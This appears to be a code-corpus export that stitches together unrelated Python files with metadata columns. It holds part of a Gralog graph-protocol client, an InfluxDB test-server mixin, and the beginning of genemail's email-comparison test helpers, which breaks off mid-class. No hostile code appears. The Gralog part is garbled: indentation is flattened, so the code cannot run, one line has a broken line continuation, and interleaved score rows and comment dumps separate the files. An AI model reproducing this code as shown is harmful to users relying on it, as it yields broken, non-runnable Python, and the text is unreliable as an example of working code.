line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
        # return: list of Edge objects with ids only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
        # return: list of Edge objects with ids only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
        # return: list of Edge objects with ids only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
            if e is not None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
        # internally: fill vertex property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
        except (IndexError, TypeError, ValueError):
pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
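        # Hypothetical call for illustration (the key/value names are invented):
        #   self.pauseUntilSpacePressed(1, ("phase", "contract"), ("round", 3))
        # would emit a protocol line of the form
        #   pauseUntilSpacePressed#1#(<tracked variables>)#(phase=contract)#(round=3)
        # and then block until a line is read back from stdin.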
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
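        # Hypothetical illustration of the reference-type caveat above
        # (object and key names are invented):
        #   stats = {"visited": 0}
        #   self.track("stats", stats)   # dict is a reference; later updates are visible
        #   self.track("count", 3)       # plain int is copied; later rebinds are not seen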
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
| en | 0.239242 | #!/usr/bin/env python3 #-1#" + "netwrokx not installed for " + sys.executable) #-1#" + "igraph not installed for " + sys.executable) # debugging = False # what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python??? # private methods #if -2, then imported without id like in TGF # don't use!! # public methods # edge as defined by start, end nodes # edge is given by id #edge has type Edge # perform analysis of graph # we want a new graph # helper functions #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" # end helper functions # Graph Manipulating Functions # return: Vertex object with id #" + str(self.id).rstrip() #" + str(self.id).rstrip() + "#" + str(v)) # return: Edge object with id only #"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \ # it's possible that the edge cannot be added (e.g., a new selfloop) #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" # creates a random Erdos-Reny graph with n id_to_vertex and edge probability p # end manilupative functions # setter functions # begin: best for private use! #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" # print("colorhex: " + str(colorHex)) #"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" #" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip() #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip() #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip() #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label # end: best for private use! #"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#" # TODO: implement this # end setter functions # getter functions # warning!! importing as pure TGF will mean edge id's will # be lost. This will result in errors on the Gralog side. #"+str(self.id).rstrip() + "#" + graphFormat.rstrip() # gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$')) # return: list of Vertex objects with id #"+str(self.id).rstrip() # return: list of fully sourced Edge objects with fully sourced endpoint Vertices #"+str(self.id).rstrip() # start: best for private use! # return: list of Vertex objects with id #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Vertex objects with id #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Vertex objects with id #"+str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Edge objects with id's only #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Edge objects with id's only #"+str(self.id).rstrip() + "#" # return: list of Edge objects with id's only #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Edge objects with id's only #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # internally: fill edge property dictionary # return: String representing queried property #"+str(self.id).rstrip() + "#" # internally: fill edge property dictionary # return: String representing queried property #"+str(self.id).rstrip() + "#" # end: best use privately! 
#"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() # runtime changer functions # ideally, something like this: # if this is a pointer, it will work # if it is an int or str, or some other non-reference type, it will not #"+str(self.id).rstrip() + "#"+str(message).rstrip()) #"+str(self.id).rstrip() + "#"+str(toSend).rstrip()) # end runtime changer functions # empty: print nothing except the new line (hacked with \t; <space> doesn't work) #-1#" + "\t") #-1#" + line) | 2.135334 | 2 |
influxdb/tests/server_tests/base.py | ocworld/influxdb-python | 2 | 8006 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
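# Hypothetical usage sketch of the mixin above (the test class name, template
# path and data point are illustrative assumptions, not part of this module):
#
#   class WriteReadTest(SingleTestCaseWithServerMixin, unittest.TestCase):
#       influxdb_template_conf = 'influxdb.conf.template'
#
#       def test_roundtrip(self):
#           self.cli.create_database('db')
#           self.cli.write_points(
#               [{'measurement': 'cpu', 'fields': {'value': 0.5}}])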
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db')
| # -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db') | en | 0.620886 | # -*- coding: utf-8 -*- Define the base module for server test. Define the single testcase with server mixin. A mixin for unittest.TestCase to start an influxdb server instance in a temporary directory **for each test function/case** # 'influxdb_template_conf' attribute must be set # on the TestCase class or instance. Set up an instance of the SingleTestCaseWithServerMixin. Tear down an instance of the SingleTestCaseWithServerMixin. Define the many testcase with server mixin. Same as the SingleTestCaseWithServerMixin but this module creates a single instance for the whole class. Also pre-creates a fresh database: 'db'. # 'influxdb_template_conf' attribute must be set on the class itself ! Set up an instance of the ManyTestCasesWithServerMixin. Set up an instance of the ManyTestCasesWithServerMixin. Deconstruct an instance of ManyTestCasesWithServerMixin. Deconstruct an instance of ManyTestCasesWithServerMixin. | 2.071552 | 2 |
genemail/testing.py | cadithealth/genemail | 5 | 8007 | <reponame>cadithealth/genemail<filename>genemail/testing.py
# -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: <NAME> <<EMAIL>>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
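# Rough illustration of the canonical form produced above (header values are
# invented): a multipart message with From and Subject headers would come out
# roughly as
#
#   Content-Type: multipart/alternative
#   From: alice@example.com
#   Subject: hello
#
# i.e. one line per header, sorted by header name, with the MIME boundary
# parameter stripped and ignored headers (Content-Transfer-Encoding by
# default) dropped.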
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
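  # Illustrative only (the test class and comparator choice are hypothetical):
  #
  #   class MyEmailTest(EmailTestMixin, unittest.TestCase):
  #     def test_receipt(self):
  #       self.registerMimeComparator('application/json', self.assertEqual)
  #       self.assertEmailEqual(sent_eml, expected_eml)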
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: <NAME> <<EMAIL>>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
